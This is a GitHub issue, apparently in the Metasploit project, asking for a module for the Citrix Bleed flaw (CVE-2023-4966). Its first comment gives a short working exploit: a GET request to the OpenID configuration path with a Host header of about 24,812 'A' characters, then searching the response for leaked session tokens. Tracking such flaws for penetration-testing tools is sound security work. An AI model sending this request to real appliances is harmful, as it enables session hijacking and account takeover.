Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2023-4966 --- Citrix Bleed: authentication bypass #18486

Closed
jvoisin opened this issue Oct 25, 2023 · 1 comment · Fixed by #18492
Closed

CVE-2023-4966 --- Citrix Bleed: authentication bypass #18486

jvoisin opened this issue Oct 25, 2023 · 1 comment · Fixed by #18492
Assignees
@smcintyre-r7
Labels
suggestion-module New module suggestions

Comments

@jvoisin
Copy link
Contributor

jvoisin commented Oct 25, 2023

https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966

tl;dr:

GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
Host: A <repeated 24812 times>
Connection: close

and grep for session tokens.
@jvoisin jvoisin added the suggestion-module New module suggestions label Oct 25, 2023
@smcintyre-r7
Copy link
Contributor

Yeah, I'll bite on this one.

@smcintyre-r7 smcintyre-r7 self-assigned this Oct 25, 2023
@smcintyre-r7 smcintyre-r7 moved this to In Progress in Metasploit Kanban Oct 25, 2023
@zeroSteiner zeroSteiner mentioned this issue Oct 26, 2023
Merged
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Oct 30, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@smcintyre-r7 smcintyre-r7

Labels
suggestion-module New module suggestions
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Add module for Citrix Bleed (CVE-2023-4966) zeroSteiner/metasploit-framework
2 participants
@jvoisin @smcintyre-r7